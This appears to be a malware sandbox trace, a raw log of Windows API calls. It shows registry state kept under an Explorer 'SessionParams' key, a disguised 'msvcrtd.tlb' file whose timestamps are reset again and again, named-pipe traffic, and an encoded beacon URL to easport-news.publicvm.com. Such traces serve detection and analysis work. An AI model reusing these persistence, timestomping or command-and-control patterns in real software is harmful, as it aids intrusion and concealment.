[0098.684] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="6C") returned 2 [0098.684] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F") returned 39 [0098.684] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F", lpString2="6C" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C" [0098.684] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="65") returned 2 [0098.684] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C") returned 41 [0098.684] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C", lpString2="65" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65" [0098.684] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="73") returned 2 [0098.684] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65") returned 43 [0098.685] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65", lpString2="73" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C6573") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C6573" [0098.685] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="74") returned 2 [0098.685] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C6573") returned 45 [0098.685] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C6573", lpString2="74" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374" [0098.685] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="64") returned 2 [0098.685] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374") returned 47 [0098.685] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374", lpString2="64" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65737464") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65737464" [0098.685] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="6D") returned 2 [0098.685] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65737464") returned 49 [0098.685] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65737464", lpString2="6D" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D" [0098.685] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="70") returned 2 [0098.685] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D") returned 51 [0098.685] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D", lpString2="70" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D70") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D70" [0098.685] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="2E") returned 2 [0098.685] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D70") returned 53 [0098.685] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D70", lpString2="2E" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E" [0098.685] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="6F") returned 2 [0098.685] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E") returned 55 [0098.685] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E", lpString2="6F" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F" [0098.685] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="63") returned 2 [0098.685] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F") returned 57 [0098.685] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F", lpString2="63" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F63") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F63" [0098.685] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="78") returned 2 [0098.685] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F63") returned 59 [0098.685] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F63", lpString2="78" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378" [0098.685] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378") returned 61 [0098.685] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378", lpString2="FF.tmp" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp" [0098.685] FindFirstFileA (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp", lpFindFileData=0x172ea7c | out: lpFindFileData=0x172ea7c) returned 0x35abe0 [0098.685] FindClose (in: hFindFile=0x35abe0 | out: hFindFile=0x35abe0) returned 1 [0098.685] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp") returned 67 [0098.685] wsprintfA (in: param_1=0x172e838, param_2="%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp") returned 67 [0098.685] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\6f6c657374646d702e6f6378ff.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0098.686] GetFileSize (in: hFile=0x194, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfa4 [0098.686] CloseHandle (hObject=0x194) returned 1 [0098.686] FindFirstFileA (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp", lpFindFileData=0x172ea7c | out: lpFindFileData=0x172ea7c) returned 0x35abe0 [0098.686] FindClose (in: hFindFile=0x35abe0 | out: hFindFile=0x35abe0) returned 1 [0098.686] GetLocalTime (in: lpSystemTime=0x172e7b4 | out: lpSystemTime=0x172e7b4*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0x1d, wHour=0xb, wMinute=0x7, wSecond=0x1f, wMilliseconds=0x172)) [0098.686] GetLastError () returned 0x0 [0098.686] SetLastError (dwErrCode=0x0) [0098.686] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e4ec | out: phkResult=0x72f1ed90*=0x194, lpdwDisposition=0x172e4ec*=0x2) returned 0x0 [0098.686] RegQueryValueExA (in: hKey=0x194, lpValueName="Plpv", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x172e544*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x172e544*=0x5c) returned 0x0 [0098.686] RegQueryValueExA (in: hKey=0x194, lpValueName="Plpv", lpReserved=0x0, lpType=0x0, lpData=0x302de0, lpcbData=0x172e544*=0x5c | out: lpType=0x0, lpData=0x302de0*=0x9a, lpcbData=0x172e544*=0x5c) returned 0x0 [0098.686] RegCloseKey (hKey=0x194) returned 0x0 [0098.686] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e510 | out: phkResult=0x72f1ed90*=0x194, lpdwDisposition=0x172e510*=0x2) returned 0x0 [0098.686] RegQueryValueExA (in: hKey=0x194, lpValueName="Pdx", lpReserved=0x0, lpType=0x0, lpData=0x172e544, lpcbData=0x172e548*=0x4 | out: lpType=0x0, lpData=0x172e544*=0x0, lpcbData=0x172e548*=0x4) returned 0x0 [0098.686] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e50c | out: phkResult=0x72f1ed90*=0x190, lpdwDisposition=0x172e50c*=0x2) returned 0x0 [0098.686] RegQueryValueExA (in: hKey=0x190, lpValueName="FPcnt", lpReserved=0x0, lpType=0x0, lpData=0x172e53c, lpcbData=0x172e540*=0x4 | out: lpType=0x0, lpData=0x172e53c*=0x0, lpcbData=0x172e540*=0x4) returned 0x0 [0098.686] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e514 | out: phkResult=0x72f1ed90*=0x19c, lpdwDisposition=0x172e514*=0x2) returned 0x0 [0098.686] RegSetValueExA (in: hKey=0x19c, lpValueName="Pdx", Reserved=0x0, dwType=0x4, lpData=0x172e548*=0x0, cbData=0x4 | out: lpData=0x172e548*=0x0) returned 0x0 [0098.687] RegCloseKey (hKey=0x19c) returned 0x0 [0098.687] GetLastError () returned 0x0 [0098.687] SetLastError (dwErrCode=0x0) [0098.687] GetLastError () returned 0x0 [0098.687] SetLastError (dwErrCode=0x0) [0098.687] GetLastError () returned 0x0 [0098.687] SetLastError (dwErrCode=0x0) [0098.687] GetLastError () returned 0x0 [0098.687] SetLastError (dwErrCode=0x0) [0098.687] GetLastError () returned 0x0 [0098.687] SetLastError (dwErrCode=0x0) [0098.687] GetLastError () returned 0x0 [0098.687] SetLastError (dwErrCode=0x0) [0098.687] GetLastError () returned 0x0 [0098.687] SetLastError (dwErrCode=0x0) [0098.687] GetLastError () returned 0x0 [0098.687] SetLastError (dwErrCode=0x0) [0098.687] GetLastError () returned 0x0 [0098.687] SetLastError (dwErrCode=0x0) [0098.687] GetLastError () returned 0x0 [0098.687] SetLastError (dwErrCode=0x0) [0098.687] GetLastError () returned 0x0 [0098.687] SetLastError (dwErrCode=0x0) [0098.687] GetLastError () returned 0x0 [0098.687] SetLastError (dwErrCode=0x0) [0098.687] GetLastError () returned 0x0 [0098.687] SetLastError (dwErrCode=0x0) [0098.687] GetLastError () returned 0x0 [0098.687] SetLastError (dwErrCode=0x0) [0098.687] GetLastError () returned 0x0 [0098.687] SetLastError (dwErrCode=0x0) [0098.687] GetLastError () returned 0x0 [0098.687] SetLastError (dwErrCode=0x0) [0098.687] GetLastError () returned 0x0 [0098.687] SetLastError (dwErrCode=0x0) [0098.687] GetLastError () returned 0x0 [0098.687] SetLastError (dwErrCode=0x0) [0098.687] GetLastError () returned 0x0 [0098.687] SetLastError (dwErrCode=0x0) [0098.688] GetLastError () returned 0x0 [0098.688] SetLastError (dwErrCode=0x0) [0098.688] GetLastError () returned 0x0 [0098.688] SetLastError (dwErrCode=0x0) [0098.688] GetLastError () returned 0x0 [0098.688] SetLastError (dwErrCode=0x0) [0098.688] GetLastError () returned 0x0 [0098.688] SetLastError (dwErrCode=0x0) [0098.688] GetLastError () returned 0x0 [0098.688] SetLastError (dwErrCode=0x0) [0098.688] GetLastError () returned 0x0 [0098.688] SetLastError (dwErrCode=0x0) [0098.688] GetLastError () returned 0x0 [0098.688] SetLastError (dwErrCode=0x0) [0098.688] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2c0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0098.688] GetFileType (hFile=0x19c) returned 0x1 [0098.688] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c3ec | out: lpSystemTimeAsFileTime=0x172c3ec*(dwLowDateTime=0x838f810, dwHighDateTime=0x1d3dfbb)) [0098.688] GetLastError () returned 0xb7 [0098.688] SetLastError (dwErrCode=0xb7) [0098.688] GetLastError () returned 0xb7 [0098.688] SetLastError (dwErrCode=0xb7) [0098.688] GetLastError () returned 0xb7 [0098.688] SetLastError (dwErrCode=0xb7) [0098.688] CloseHandle (hObject=0x19c) returned 1 [0098.688] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0098.688] SetFileTime (hFile=0x19c, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0098.689] CloseHandle (hObject=0x19c) returned 1 [0098.689] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\6f6c657374646d702e6f6378ff.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0098.689] GetFileSize (in: hFile=0x19c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfa4 [0098.689] CreateFileMappingA (hFile=0x19c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x1a0 [0098.689] MapViewOfFile (hFileMappingObject=0x1a0, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2c0000 [0098.689] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xea60) returned 0x0 [0098.690] CreateFileW (lpFileName="\\\\.\\pipe\\c41b2304" (normalized: "\\device\\namedpipe\\c41b2304"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0098.690] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x1a8 [0098.690] SetNamedPipeHandleState (hNamedPipe=0x1a4, lpMode=0x172e544, lpMaxCollectionCount=0x0, lpCollectDataTimeout=0x0) returned 1 [0098.690] GetTickCount () returned 0x274f0 [0098.690] GetLastError () returned 0x0 [0098.690] SetLastError (dwErrCode=0x0) [0098.690] GetLastError () returned 0x0 [0098.690] SetLastError (dwErrCode=0x0) [0098.690] GetLastError () returned 0x0 [0098.690] SetLastError (dwErrCode=0x0) [0098.690] GetLastError () returned 0x0 [0098.690] SetLastError (dwErrCode=0x0) [0098.690] GetLastError () returned 0x0 [0098.690] SetLastError (dwErrCode=0x0) [0098.690] GetLastError () returned 0x0 [0098.690] SetLastError (dwErrCode=0x0) [0098.690] GetLastError () returned 0x0 [0098.690] SetLastError (dwErrCode=0x0) [0098.690] GetLastError () returned 0x0 [0098.690] SetLastError (dwErrCode=0x0) [0098.690] GetLastError () returned 0x0 [0098.690] SetLastError (dwErrCode=0x0) [0098.690] GetLastError () returned 0x0 [0098.690] SetLastError (dwErrCode=0x0) [0098.690] UnmapViewOfFile (lpBaseAddress=0x2c0000) returned 1 [0098.691] CloseHandle (hObject=0x1a0) returned 1 [0098.691] CloseHandle (hObject=0x19c) returned 1 [0098.691] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0098.691] GetFileType (hFile=0x19c) returned 0x1 [0098.691] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c3fc | out: lpSystemTimeAsFileTime=0x172c3fc*(dwLowDateTime=0x838f810, dwHighDateTime=0x1d3dfbb)) [0098.691] GetLastError () returned 0xb7 [0098.691] SetLastError (dwErrCode=0xb7) [0098.691] GetLastError () returned 0xb7 [0098.691] SetLastError (dwErrCode=0xb7) [0098.691] GetLastError () returned 0xb7 [0098.691] SetLastError (dwErrCode=0xb7) [0098.691] CloseHandle (hObject=0x19c) returned 1 [0098.691] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0098.691] SetFileTime (hFile=0x19c, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0098.691] CloseHandle (hObject=0x19c) returned 1 [0098.692] strlen (_Str="easport-news.publicvm.com") returned 0x19 [0098.692] strlen (_Str="index/index.php?h=8AsKjDaVkr4%3d&d=8gsPb42LBb7wCgW9AKOji8g5P7sGpqKKwDsKjDaVkr7wCwqMNpWjiMY6P7QEoKWOwzs%2bvAbRo43EPDi8BKyiit5heusWtbKe0CsqrBa1sp7QKyqsFrWyns%3d%3d") returned 0xa1 [0098.692] strlen (_Str="166158257030400D1347202904.jpg") returned 0x1e [0098.692] WriteFile (in: hFile=0x1a4, lpBuffer=0x1fd0268*, nNumberOfBytesToWrite=0x10a7, lpNumberOfBytesWritten=0x172e4f4, lpOverlapped=0x311230 | out: lpBuffer=0x1fd0268*, lpNumberOfBytesWritten=0x172e4f4*=0x10a7, lpOverlapped=0x311230) returned 1 [0098.694] ReadFile (in: hFile=0x1a4, lpBuffer=0x171e538, nNumberOfBytesToRead=0xffff, lpNumberOfBytesRead=0x171e534, lpOverlapped=0x311230 | out: lpBuffer=0x171e538*, lpNumberOfBytesRead=0x171e534*=0x134, lpOverlapped=0x311230) returned 1 [0100.188] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x7a120) returned 0x0 [0100.188] GetOverlappedResult (in: hFile=0x1a4, lpOverlapped=0x311230, lpNumberOfBytesTransferred=0x171e534, bWait=0 | out: lpNumberOfBytesTransferred=0x171e534) returned 1 [0100.188] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d4, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0100.188] GetFileType (hFile=0x19c) returned 0x1 [0100.189] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c400 | out: lpSystemTimeAsFileTime=0x172c400*(dwLowDateTime=0x91d7c10, dwHighDateTime=0x1d3dfbb)) [0100.189] GetLastError () returned 0xb7 [0100.189] SetLastError (dwErrCode=0xb7) [0100.189] GetLastError () returned 0xb7 [0100.189] SetLastError (dwErrCode=0xb7) [0100.189] GetLastError () returned 0xb7 [0100.189] SetLastError (dwErrCode=0xb7) [0100.189] CloseHandle (hObject=0x19c) returned 1 [0100.189] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0100.189] SetFileTime (hFile=0x19c, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0100.189] CloseHandle (hObject=0x19c) returned 1 [0100.189] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d4, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0100.190] GetFileType (hFile=0x19c) returned 0x1 [0100.190] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c400 | out: lpSystemTimeAsFileTime=0x172c400*(dwLowDateTime=0x91d7c10, dwHighDateTime=0x1d3dfbb)) [0100.190] GetLastError () returned 0xb7 [0100.190] SetLastError (dwErrCode=0xb7) [0100.190] GetLastError () returned 0xb7 [0100.190] SetLastError (dwErrCode=0xb7) [0100.190] GetLastError () returned 0xb7 [0100.190] SetLastError (dwErrCode=0xb7) [0100.190] CloseHandle (hObject=0x19c) returned 1 [0100.190] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0100.190] SetFileTime (hFile=0x19c, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0100.190] CloseHandle (hObject=0x19c) returned 1 [0100.190] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172e3a0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0100.190] GetFileType (hFile=0x19c) returned 0x1 [0100.191] CloseHandle (hObject=0x19c) returned 1 [0100.191] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0100.191] SetFileTime (hFile=0x19c, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0100.191] CloseHandle (hObject=0x19c) returned 1 [0100.191] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e510 | out: phkResult=0x72f1ed90*=0x19c, lpdwDisposition=0x172e510*=0x2) returned 0x0 [0100.191] RegSetValueExA (in: hKey=0x19c, lpValueName="FPcnt", Reserved=0x0, dwType=0x4, lpData=0x172e540*=0x0, cbData=0x4 | out: lpData=0x172e540*=0x0) returned 0x0 [0100.191] RegCloseKey (hKey=0x19c) returned 0x0 [0100.191] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e50c | out: phkResult=0x72f1ed90*=0x19c, lpdwDisposition=0x172e50c*=0x2) returned 0x0 [0100.191] RegQueryValueExA (in: hKey=0x19c, lpValueName="FPcnt", lpReserved=0x0, lpType=0x0, lpData=0x172e53c, lpcbData=0x172e540*=0x4 | out: lpType=0x0, lpData=0x172e53c*=0x0, lpcbData=0x172e540*=0x4) returned 0x0 [0100.192] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d4, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0100.192] GetFileType (hFile=0x1a0) returned 0x1 [0100.192] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c400 | out: lpSystemTimeAsFileTime=0x172c400*(dwLowDateTime=0x91d7c10, dwHighDateTime=0x1d3dfbb)) [0100.192] GetLastError () returned 0xb7 [0100.192] SetLastError (dwErrCode=0xb7) [0100.192] GetLastError () returned 0xb7 [0100.192] SetLastError (dwErrCode=0xb7) [0100.192] GetLastError () returned 0xb7 [0100.192] SetLastError (dwErrCode=0xb7) [0100.192] CloseHandle (hObject=0x1a0) returned 1 [0100.192] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0100.192] SetFileTime (hFile=0x1a0, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0100.192] CloseHandle (hObject=0x1a0) returned 1 [0100.192] CloseHandle (hObject=0x1a4) returned 1 [0100.192] CloseHandle (hObject=0x1a8) returned 1 [0100.193] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xea60) returned 0x0 [0100.193] CreateFileW (lpFileName="\\\\.\\pipe\\c41b2304" (normalized: "\\device\\namedpipe\\c41b2304"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0100.193] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x1a4 [0100.193] SetNamedPipeHandleState (hNamedPipe=0x1a8, lpMode=0x172e544, lpMaxCollectionCount=0x0, lpCollectDataTimeout=0x0) returned 1 [0100.193] WriteFile (in: hFile=0x1a8, lpBuffer=0x312ec8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x172e540, lpOverlapped=0x311230 | out: lpBuffer=0x312ec8*, lpNumberOfBytesWritten=0x172e540*=0x8, lpOverlapped=0x311230) returned 1 [0100.193] CloseHandle (hObject=0x1a8) returned 1 [0100.193] CloseHandle (hObject=0x1a4) returned 1 [0100.193] TerminateProcess (hProcess=0x0, uExitCode=0x0) returned 0 [0100.193] GetLastError () returned 0x6 [0100.193] 